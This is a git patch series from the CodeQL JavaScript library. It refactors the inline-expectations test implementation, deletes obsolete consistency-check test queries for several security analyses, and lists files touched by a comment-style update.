a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } From 7e5c24a8ec732346b3e464d9bef92a1b6118b68e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 4 Feb 2025 12:48:51 +0100 Subject: [PATCH 045/892] JS: Remove uses of old inline expectation test library --- .../CWE-022/TaintedPath/Consistency.expected | 0 .../CWE-022/TaintedPath/Consistency.ql | 9 -------- .../Security/CWE-073/Consistency.expected | 0 .../Security/CWE-073/Consistency.ql | 3 --- .../Security/CWE-078/Consistency.expected | 0 .../Security/CWE-078/Consistency.ql | 23 ------------------- .../ConsistencyDomBasedXss.expected | 0 .../DomBasedXss/ConsistencyDomBasedXss.ql | 9 -------- .../ConsistencyExceptionXss.expected | 0 .../ExceptionXss/ConsistencyExceptionXss.ql | 3 --- .../ConsistencyReflectedXss.expected | 0 .../ReflectedXss/ConsistencyReflectedXss.ql | 3 --- .../StoredXss/ConsistencyStoredXss.expected | 0 .../CWE-079/StoredXss/ConsistencyStoredXss.ql | 3 --- ...ConsistencyUnsafeHtmlConstruction.expected | 0 .../ConsistencyUnsafeHtmlConstruction.ql | 3 --- .../ConsistencyUnsafeJQueryPlugin.expected | 0 .../ConsistencyUnsafeJQueryPlugin.ql | 3 --- .../ConsistencyXssThroughDom.expected | 0 .../XssThroughDom/ConsistencyXssThroughDom.ql | 14 ----------- .../CWE-089/untyped/Consistency.expected | 0 .../Security/CWE-089/untyped/Consistency.ql | 4 ---- .../Security/CWE-502/Consistency.expected | 0 .../Security/CWE-502/Consistency.ql | 3 --- .../Consistency.expected | 0 .../ClientSideUrlRedirect/Consistency.ql | 9 -------- .../ResourceExhaustion/Consistency.expected | 0 .../CWE-770/ResourceExhaustion/Consistency.ql | 3 --- .../Consistency.expected | 1 - .../Consistency.ql | 16 ------------- 30 files changed, 109 deletions(-) delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null @@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644 index ec505e62e171..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644 index 9019d53e10ed..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644 index 38bae3a6aea6..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644 index e67885e96b96..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644 index d7e452b2a8c1..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644 index 547763a8f838..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql +++ /dev/null @@ -1,14 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.XssThroughDomQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - XssThroughDomFlow::flow(source, result) and - not isIgnoredSourceSinkPair(source, result) - ) - } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644 index 9c721994d677..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql +++ /dev/null @@ -1,4 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection -import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql deleted file mode 100644 index 6c43567b5c45..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.UnsafeDeserializationQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql deleted file mode 100644 index e02e59dcb19a..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ClientSideUrlRedirectQuery -import utils.test.ConsistencyChecking - -deprecated class ClientSideUrlRedirectConsistency extends ConsistencyConfiguration { - ClientSideUrlRedirectConsistency() { this = "ClientSideUrlRedirectConsistency" } - - override DataFlow::Node getAnAlert() { ClientSideUrlRedirectFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql deleted file mode 100644 index a5da63e682d0..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ResourceExhaustionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644 index 8efa3a055b19..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected +++ /dev/null @@ -1 +0,0 @@ -| lib.js:70 | expected an alert, but found none | NOT OK | Config | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql deleted file mode 100644 index d80f9d23ff52..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql +++ /dev/null @@ -1,16 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery - -deprecated class Config extends ConsistencyConfiguration { - Config() { this = "Config" } - - override File getAFile() { any() } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - PrototypePollutingAssignmentFlow::flow(source, result) and - not isIgnoredLibraryFlow(source, result) - ) - } -} From 9be041e27da36e8ccb2062e8a59be0478e3fa141 Mon Sep 17 00:00:00 2001 From: Asger F Date: Thu, 6 Feb 2025 13:34:01 +0100 Subject: [PATCH 046/892] JS: Update OK-style comments to $-style --- .../DeadAngularJSEventListener/tst.js | 26 +- .../AngularJS/DependencyMismatch/tst.js | 16 +- .../AngularJS/DisablingSce/DisablingSce.js | 10 +- .../angular-incompatible-service.js | 116 +++---- .../AngularJS/InsecureUrlWhitelist/tst.js | 30 +- .../missing-explicit-injection.js | 22 +- .../RepeatedInjection/repeated-injection.js | 20 +- .../unused-angular-dependency.js | 20 +- .../query-tests/AngularJS/UseNgSrc/tst.html | 5 +- .../query-tests/AngularJS/UseNgSrc/tst2.html | 3 +- .../AngularJS/UseNgSrc/tst_fragment.html | 3 +- .../query-tests/Comments/TodoComments/tst.js | 2 +- .../ql/test/query-tests/DOM/Alert/alert.js | 8 +- .../ql/test/query-tests/DOM/HTML/tst.js | 22 +- .../test/query-tests/DOM/TargetBlank/tst.js | 29 +- .../Declarations/ArgumentsRedefined/tst.js | 4 +- .../ArgumentsRedefined/types.d.ts | 4 +- .../Declarations/AssignmentToConst/classes.js | 3 +- .../Declarations/AssignmentToConst/const6.js | 2 +- .../AssignmentToConst/functions.js | 3 +- .../Declarations/AssignmentToConst/other.js | 2 +- .../Declarations/AssignmentToConst/tst.js | 16 +- .../Declarations/ClobberingVarInit/tst.js | 7 +- .../Declarations/DeadStoreOfGlobal/tst.js | 17 +- .../DeadStoreOfLocal/computedFieldNames.ts | 4 +- .../computedInterfaceProperty.ts | 10 +- .../DeadStoreOfLocal/exportDefaultClass.ts | 4 +- .../DeadStoreOfLocal/exportDefaultFunction.ts | 2 +- .../Declarations/DeadStoreOfLocal/extends.js | 2 +- .../DeadStoreOfLocal/for-of-continue.js | 2 +- .../DeadStoreOfLocal/namespace.ts | 2 +- .../Declarations/DeadStoreOfLocal/overload.ts | 12 +- .../Declarations/DeadStoreOfLocal/tst.js | 36 +- .../Declarations/DeadStoreOfLocal/tst2.js | 7 +- .../Declarations/DeadStoreOfLocal/tst3.js | 3 +- .../Declarations/DeadStoreOfLocal/tst3b.js | 3 +- .../DeadStoreOfProperty/accessors.js | 8 +- .../DeadStoreOfProperty/exports.js | 2 +- .../DeadStoreOfProperty/fieldInit.ts | 6 +- .../real-world-examples.js | 10 +- .../Declarations/DeadStoreOfProperty/tst.js | 38 +-- .../Declarations/DeclBeforeUse/jslint.js | 8 +- .../Declarations/DeclBeforeUse/tst2.js | 6 +- .../Declarations/DeclBeforeUse/typescript.ts | 4 +- .../Declarations/DuplicateVarDecl/tst.js | 5 +- .../IneffectiveParameterType/tst.js | 2 +- .../IneffectiveParameterType/tst.ts | 22 +- .../MissingThisQualifier/abstract-missing.ts | 2 +- .../ignored-by-externs.js | 2 +- .../MissingThisQualifier/ignored-by-jslint.js | 2 +- .../MissingThisQualifier/indirection.js | 4 +- .../MissingThisQualifier/missing1.js | 2 +- .../MissingThisQualifier/missing2.js | 2 +- .../MissingThisQualifier/namespaces-uses.ts | 38 +-- .../MissingThisQualifier/non-global.js | 2 +- .../not-ignored-by-jslint.js | 2 +- .../MissingThisQualifier/present1.js | 2 +- .../MissingThisQualifier/present2.js | 2 +- .../Declarations/MissingVarDecl/test.js | 30 +- .../MixedStaticInstanceThisAccess/abstract.ts | 2 +- .../instanceInstance.js | 2 +- .../instanceInstanceWithStaticExtra.js | 2 +- .../instanceStatic.js | 2 +- .../staticInstance.js | 2 +- .../staticStatic.js | 2 +- .../staticStaticWithInstanceExtra.js | 2 +- .../throughClass.js | 2 +- .../MixedStaticInstanceThisAccess/tst.js | 12 +- .../RedeclaredVariable/externs.js | 2 +- .../Declarations/RedeclaredVariable/tst.js | 2 +- .../Declarations/RedeclaredVariable/tst.ts | 6 +- .../Declarations/RedeclaredVariable/tst3.js | 2 +- .../Declarations/RedeclaredVariable/tst4.js | 8 +- .../SuspiciousMethodNameDeclaration/tst.js | 2 +- .../SuspiciousMethodNameDeclaration/tst.ts | 22 +- .../Declarations/TemporalDeadZone/tst.js | 15 +- .../Declarations/TooManyParameters/externs.js | 2 +- .../Declarations/UniqueParameterNames/tst.js | 10 +- .../Declarations/UniquePropertyNames/tst.js | 6 +- .../Declarations/UnreachableOverloads/tst.ts | 20 +- .../Declarations/UnstableCyclicImport/A.ts | 2 +- .../Declarations/UnstableCyclicImport/B.ts | 2 +- .../UnstableCyclicImport/acyclicImport.ts | 2 +- .../UnstableCyclicImport/exportCycleA.ts | 2 +- .../UnstableCyclicImport/exportCycleB.ts | 2 +- .../UnstableCyclicImport/safeA.ts | 2 +- .../UnstableCyclicImport/safeB.ts | 2 +- .../UnstableCyclicImport/typeA.ts | 2 +- .../Declarations/UnusedParameter/istype.ts | 4 +- .../UnusedParameter/parameter_field.ts | 4 +- .../UnusedParameter/thisparameter.ts | 2 +- .../Declarations/UnusedParameter/tst.js | 16 +- .../Declarations/UnusedParameter/tst2.js | 13 +- .../UnusedVariable/Babelrc/importPragma.jsx | 2 +- .../UnusedVariable/UnusedIndexVariable.js | 2 +- .../Declarations/UnusedVariable/decorated.ts | 10 +- .../Declarations/UnusedVariable/externs.js | 5 +- .../UnusedVariable/importWithoutPragma.jsx | 2 +- .../Declarations/UnusedVariable/importtype.ts | 4 +- .../Declarations/UnusedVariable/interTypes.ts | 2 +- .../UnusedVariable/namespaceImportAsType.ts | 6 +- .../Declarations/UnusedVariable/node.js | 2 +- .../Declarations/UnusedVariable/react-jsx.js | 2 +- .../UnusedVariable/require-react-1.js | 2 +- .../UnusedVariable/require-react-2.js | 2 +- .../UnusedVariable/require-react-3.js | 2 +- .../require-react-in-other-scope.js | 2 +- .../Declarations/UnusedVariable/thisparam.ts | 2 +- .../typeInTemplateLiteralTag.ts | 6 +- .../Declarations/UnusedVariable/typeoftype.ts | 8 +- .../Declarations/UnusedVariable/types.d.ts | 2 +- .../Declarations/UnusedVariable/underscore.js | 12 +- .../UnusedVariable/unusedShadowed.ts | 6 +- .../EnablingNodeIntegration.js | 12 +- .../Expressions/BitwiseSignCheck/tst.js | 12 +- .../Expressions/CompareIdenticalValues/tst.js | 17 +- .../Expressions/DuplicateProperty/tst.js | 14 +- .../Expressions/ExprHasNoEffect/es2015.js | 2 +- .../Expressions/ExprHasNoEffect/should.js | 2 +- .../Expressions/ExprHasNoEffect/try.js | 2 +- .../Expressions/ExprHasNoEffect/tst.js | 61 ++-- .../Expressions/ExprHasNoEffect/tst2.js | 3 +- .../HeterogeneousComparison/tst.js | 149 ++++----- .../ImplicitOperandConversion/tst.js | 65 ++-- .../Expressions/MissingAwait/tsTest.ts | 2 +- .../Expressions/MissingAwait/tst.js | 42 +-- .../MissingDotLengthInComparison.js | 14 +- .../Expressions/MisspelledIdentifier/tst.js | 31 +- .../Expressions/RedundantExpression/tst.js | 2 +- .../Expressions/SelfAssignment/jsdoc.js | 4 +- .../Expressions/SelfAssignment/tst.js | 15 +- .../Expressions/ShiftOutOfRange/tst.js | 4 +- .../Expressions/SuspiciousInvocation/eval.js | 8 +- .../SuspiciousInvocation/namespace.ts | 12 +- .../Expressions/SuspiciousInvocation/super.js | 5 +- .../export_equals_client.ts | 2 +- .../export_import_client.ts | 2 +- .../Expressions/SuspiciousPropAccess/tst2.ts | 2 +- .../SuspiciousPropAccess/typeassertion.ts | 4 +- .../SuspiciousPropAccess/typeoftype.ts | 4 +- .../UnboundEventHandlerReceiver/tst.js | 38 +-- .../UnclearOperatorPrecedence/tst.js | 14 +- .../UnclearOperatorPrecedence/tst.min.js | 2 +- .../UnknownDirective/UnknownDirective.html | 8 +- .../UnknownDirective/UnknownDirective.js | 66 ++-- .../global-module-definition.js | 2 +- .../module-environment-detection.js | 2 +- .../regression.js | 4 +- .../UnneededDefensiveProgramming/tst.js | 128 ++++---- .../UnneededDefensiveProgramming/tst2.js | 6 +- .../WhitespaceContradictsPrecedence/tst.js | 9 +- .../JSDoc/UndocumentedParameter/tst.js | 7 +- .../LanguageFeatures/BadTypeof/tst.js | 23 +- .../LanguageFeatures/EmptyArrayInit/tst.js | 14 +- .../ExpressionClosures/tst.js | 7 +- .../LanguageFeatures/IllegalInvocation/tst.js | 38 +-- .../LanguageFeatures/InconsistentNew/a1.js | 4 +- .../LanguageFeatures/InconsistentNew/a2.js | 4 +- .../InconsistentNew/arraycalls.js | 4 +- .../LanguageFeatures/InconsistentNew/tst.js | 8 +- .../LanguageFeatures/InvalidPrototype/tst.js | 18 +- .../LengthComparisonOffByOne/tst.js | 23 +- .../NonLinearPattern/ts-test.ts | 23 +- .../LanguageFeatures/NonLinearPattern/tst.js | 13 +- .../PropertyWriteOnPrimitive/tst.js | 18 +- .../SemicolonInsertion/tst.js | 14 +- .../SetterIgnoresParameter/tst.js | 12 +- .../LanguageFeatures/SetterReturn/tst.js | 7 +- .../SpuriousArguments/es2015.js | 10 +- .../SpuriousArguments/globals.js | 8 +- .../SpuriousArguments/thisparameter.ts | 4 +- .../LanguageFeatures/SpuriousArguments/tst.js | 55 ++-- .../StrictModeCallStackIntrospection/tst.js | 20 +- .../TemplateSyntaxInStringLiteral.js | 4 +- .../YieldInNonGenerator/tst.js | 3 +- .../query-tests/NodeJS/DubiousImport/main.js | 2 +- .../NodeJS/DubiousImport/multi_import.js | 6 +- .../query-tests/NodeJS/InvalidExport/tst.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst2a.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2c.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst4.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst5.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst6.js | 2 +- .../query-tests/NodeJS/MissingExports/tst.js | 12 +- .../UnresolvableImport/src/sub/subsub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/sub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/tst.js | 22 +- .../NodeJS/UnresolvableImport/tst.js | 2 +- .../Performance/NonLocalForIn/tst.js | 21 +- .../ReassignParameterAndUseArguments/tst.js | 7 +- .../React/InconsistentStateUpdate/tst.js | 32 +- .../tst.js | 58 ++-- .../undefined.js | 62 ++-- .../UnusedOrUndefinedStateProperty/unused.js | 26 +- .../RegExp/BackrefBeforeGroup/tst.js | 14 +- .../BackrefIntoNegativeLookahead/tst.js | 5 +- .../DuplicateCharacterInCharacterClass/tst.js | 4 +- .../RegExp/IdentityReplacement/tst.js | 26 +- .../query-tests/RegExp/MalformedRegExp/tst.js | 2 +- .../RegExp/RegExpAlwaysMatches/tst.js | 38 +-- .../query-tests/RegExp/UnboundBackref/tst.js | 17 +- .../RegExp/UnmatchableCaret/tst.js | 26 